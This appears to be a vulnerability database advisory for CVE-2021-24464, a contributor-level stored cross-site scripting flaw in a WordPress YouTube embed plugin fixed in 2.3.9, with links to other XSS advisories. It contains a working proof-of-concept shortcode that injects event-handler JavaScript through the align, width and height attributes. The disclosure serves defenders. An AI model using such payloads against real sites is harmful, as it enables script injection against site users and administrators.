YouTube Embed, Playlist and Popup < 2.3.9 – Contributor+ Stored XSS | CVE 2021-24464 | Plugin Vulnerabilities

Description

The plugin did not escape, validate or sanitise some of its shortcode options, available to users with a role as low as Contributor, leading to an authenticated Stored Cross-Site Scripting issue.

Proof of Concept

Affected attributes: unescaped align, width and height parameters of wpdevart_youtube shortcode.

[wpdevart_youtube align='center;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(1)' width='" onload="alert(2)//' height='" onmouseover="alert(3)//']dQw4w9WgXcQ[/wpdevart_youtube]

Affects Plugins

youtube-video-player

Fixed in 2.3.9

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

531b3fac-48b9-4821-a3aa-4db073d43aae

Timeline

Publicly Published

2021-06-28 (about 2 years ago)

Added

2021-06-28 (about 2 years ago)

Last Updated

2022-01-02 (about 2 years ago)

Other

Published

Title

Published

2024-02-23

Title

Archivist – Custom Archive Templates < 1.7.6 - Reflected Cross-Site Scripting

Published

2023-04-21

Title

Live Chat by Formilla < 1.3.1 - Admin+ Stored XSS

Published

2024-01-23

Title

Travelpayouts < 1.1.14 - Reflected XSS

Published

2020-07-05

Title

Careerfy < 4.1.0 - Multiple Cross-Site Scripting (XSS) Issues

Published

2014-10-06

Title

Contact Form 7 Integrations 1.0 - 1.3.10 Multiple Cross-Site scripting (XSS)